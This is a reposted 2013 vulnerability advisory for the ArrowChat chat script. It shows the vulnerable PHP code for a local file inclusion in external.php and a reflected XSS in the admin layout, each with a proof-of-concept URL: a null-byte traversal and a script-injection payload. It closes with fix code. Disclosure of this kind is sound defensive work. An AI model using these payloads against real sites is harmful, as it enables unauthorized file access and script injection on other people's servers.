ArrowChat - exploit.company

vendor:

ArrowChat

by:

Kallimero

7,5

CVSS

HIGH

Local File Inclusion & Reflected XSS

98, 79

CWE

Product Name: ArrowChat

Affected Version From: 1.5.61

Affected Version To: 1.6

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Debian

2013

ArrowChat <=~ 1.5.61 Multiple vulnerabilities

ArrowChat is a chat script, which is able to be integrate in various CMS, as wordpress, or some bulletin boards. The vulnerability is due to the lack of secure validation of the 'lang' parameter in the external.php file, which allows an attacker to include arbitrary files on the server. Additionally, the reflected XSS vulnerability is due to the lack of secure validation of the 'PHP_SELF' parameter in the admin/layout/pages_general.php file, which allows an attacker to inject arbitrary HTML and script code.

Mitigation:

To fix the LFI, replace the code in external.php with the code provided in the text. To fix the XSS, replace the code in admin/layout/pages_general.php with the code provided in the text.

Source

Exploit-DB raw data:

# Exploit Title: ArrowChat <=~ 1.5.61  Multiple vulnerabilities
# Date: 01/01/2013
# Exploit Author: Kallimero
# Version: 1.5.61, before, and maybe 1.6
# Tested on: Debian


Introduction
============

ArrowChat is a chat script, which is able to be integrate in various CMS,
as wordpress, or some bulletin boards.


Vulnz
========


1- ) Local File Inclusion


external.php let us load langage, but not a secure way.

---------------[external.php]---------------

// Load another language if lang GET value is set and exists
if (var_check('lang'))
{
    $lang = get_var('lang');

    if (file_exists(dirname(__FILE__) . DIRECTORY_SEPARATOR .
AC_FOLDER_LANGUAGE . DIRECTORY_SEPARATOR . $lang . DIRECTORY_SEPARATOR .
$lang . ".php"))
    {
        include (dirname(__FILE__) . DIRECTORY_SEPARATOR .
AC_FOLDER_LANGUAGE . DIRECTORY_SEPARATOR . $lang . DIRECTORY_SEPARATOR .
$lang . ".php");
    }
}
---------------[index.php]---------------

Thanks to the nullbyte tricks we'll be able to include any php file, like
that :

http://[site]/[path]/external.php?lang=../path/to/file%00&type=djs

2- ) reflected XSS

The administration layout is accessible for anyone. Even if we can't exec
the php code of the admin, we can inject html thanks to $_SERVER['PHP_SELF']


Example :
-------[admin/layout/pages_general.php]-----

<form method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>?do=<?php
echo $do; ?>" enctype="multipart/form-data">
----------------------------------

PoC:
http://
[site]/[path]/admin/layout/pages_general.php/'"/><script>alert(1);</script>


How to Fix ?
============

 To fix the LFI, you can replace it with :
 // Load another language if lang GET value is set and exists

if (var_check('lang'))
{
    $lang = get_var('lang');
    if(preg_match("#^[a-z]{2,5}$#i", $lang)){
        if (file_exists(dirname(__FILE__) . DIRECTORY_SEPARATOR .
AC_FOLDER_LANGUAGE . DIRECTORY_SEPARATOR . $lang . DIRECTORY_SEPARATOR .
$lang . ".php"))
        {
            include (dirname(__FILE__) . DIRECTORY_SEPARATOR .
AC_FOLDER_LANGUAGE . DIRECTORY_SEPARATOR . $lang . DIRECTORY_SEPARATOR .
$lang . ".php");
        }
    }
}

lang will be include only if it's a valid lang file.

For the XSS's, you can use a .htaccess to protect the layout directory, and
use htmlentities to avoid the html inj'.



Thanks
=========

All hwc members : Necromoine, fr0g, AppleSt0rm, St0rn, Zhyar, k3nz0,
gr4ph0s.
Please visit : http://www.orgasm.re/